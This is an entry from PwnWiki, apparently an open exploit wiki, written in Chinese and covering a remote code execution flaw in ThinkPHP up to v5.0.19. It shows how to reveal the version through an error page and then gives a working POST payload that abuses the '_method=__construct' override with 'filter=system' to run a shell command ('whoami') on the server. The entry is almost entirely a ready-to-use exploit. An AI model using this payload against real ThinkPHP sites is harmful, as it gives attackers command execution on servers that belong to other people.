PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
影响版本
ThinkPHP <= v5.0.19
漏洞利用
通过报错确定ThinkPHP版本:
http://127.0.0.1/tk5/public/index.php/111
Payload
http://127.0.0.1/tk5/public/index.php
post发送数据:
s=whoami&_method=__construct&method=&filter=system
免费、自由、人人可编辑的漏洞库--PwnWiki.com
